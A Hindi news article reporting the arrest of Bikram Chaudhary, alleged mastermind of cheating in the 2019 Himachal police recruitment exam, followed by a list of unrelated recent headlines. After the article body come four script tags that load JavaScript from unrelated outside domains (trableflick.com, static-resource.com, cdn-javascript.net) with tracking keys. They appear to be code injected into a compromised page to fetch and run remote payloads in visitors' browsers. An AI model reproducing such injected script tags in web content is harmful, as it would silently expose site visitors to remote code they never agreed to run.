Categories: हिमाचल

हिमाचल पुलिस भर्ती में गड़बड़झाला करने वाले मुख्य सरगना और मास्टरमाइंड गिरफ्तार

<p>नए साल की शुरूआत के साथ ही कांगड़ा पुलिस ने हिमाचल पुलिस भर्ती में गड़बड़झाला करने वाले मुख्य सरगना और मास्टरमाइंड बिक्रम चौधरी को गिरफ्तार कर लिया है। हालांकि जिस मास्टरमाइंड आरोपी की गिरफ्तारी के लिए पुलिस पांच महीनों तक कई राज्यों की खाक छानती रही। नेपाल तक जाकर आ गई आज उसी पुलिस की चौखट पर आकर इस मुख्य मुन्नाभाई ने सरेंडर कर दिया है। काबिलेगौर है कि हिमाचल प्रदेश में बीते साल&nbsp; पुलिस भर्ती के लिए आवेदन मांगे गए थे जिसमें 1063 पदों के लिए करीब 40 हजार आवेदन मिले थे और 11 अगस्त को पालमपुर के सत्संग ब्यास भवन के प्रांगण में उन सबके लिए परीक्षा आयोजित की थी।</p>

<p>इससे पहले की परीक्षा अपने चरम पर पहुंचती पुलिस की इंटेलिजेंस विंग ने पहले ही कुछ संदिग्ध लोगों को गिरफ्तार कर लिया। जिनकी निशानदेही पर परीक्षा हॉल में भी पांच से सात मुन्नाभाई धरे गए जो दूसरों के स्थान पर परीक्षा दे रहे थे। इस तरह गिरफ्तारियों का ये सिलसिला चलता रहा और एक के बाद एक करके अब तक 34 आरोपी गिरफ्तार किए जा चुके थे। बावजूद इसके इस पूरे घटनाक्रम का मास्टरमाइंड़ बिक्रम चौधरी अभी तक फरार चल रहा था हालांकि बिक्रम चौधरी के घर पर भी पुलिस द्वारा सबसे पहले रेड की गई थी जहां से उन्हें 11 लाख रुपये की नकदी भी बरामद हुई थी मगर बिक्रम चौधरी मौके से फरार हो चुका था।</p>

<p>बता दें कि विक्रम चौधरी कांगड़ा ही ज्वाली का रहने वाला है। फिलहाल पुलिस मुन्नाभाई बिक्रम को कोर्ट में पेश कर अतिरिक्त पुलिस रिमांड की मांग करेगी ताकि आरोपी बिक्रम के तार कहां-कहां जुड़े हुए हैं। इसका पता लगाया जा सके और इतने दिन ये पुलिस को चकमा देकर कहां रहा, इसके बारे में भी जानने की पुलिस पूरी कोशिश करेगी।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578108995994″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

पुराने साथियों की घर वापसी से कांग्रेस संगठन हो रहा मजबूत

शिमला जिला के कुमारसैन वार्ड के जिला परिषद सदस्य उज्वल मेहता आज प्रदेश कांग्रेस मुख्यालय…

12 hours ago

“भाजपा कांग्रेस के घोषणा पत्र को लेकर भ्रामक प्रचार कर रही”

लोकसभा चुनाव में कांग्रेस घोषणा पत्र को लेकर जहां भाजपा बार-बार हिंदुत्व विरोधी और बहुसंख्यक…

12 hours ago

राष्ट्रपति द्रौपदी मुर्मू का आज शिमला पहुंचने पर स्वागत

राष्ट्रपति द्रौपदी मुर्मु का आज शिमला पहुंचने पर मशोबरा स्थित कल्याणी हेलीपैड पर राज्यपाल शिव…

12 hours ago

बागवान भोपाल ने तकनीक के इस्तेमाल से किसानी को बनाया मुनाफे का सौदा

वर्तमान में किसनी और बागवानी में भी आधुनिकीकरण का प्रभाव देखने को मिल रहा है.…

13 hours ago

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी -गद्दी नेता कपूर बीते…

14 hours ago

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध: बिंदल

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध, कांग्रेस नेता कर रहे…

15 hours ago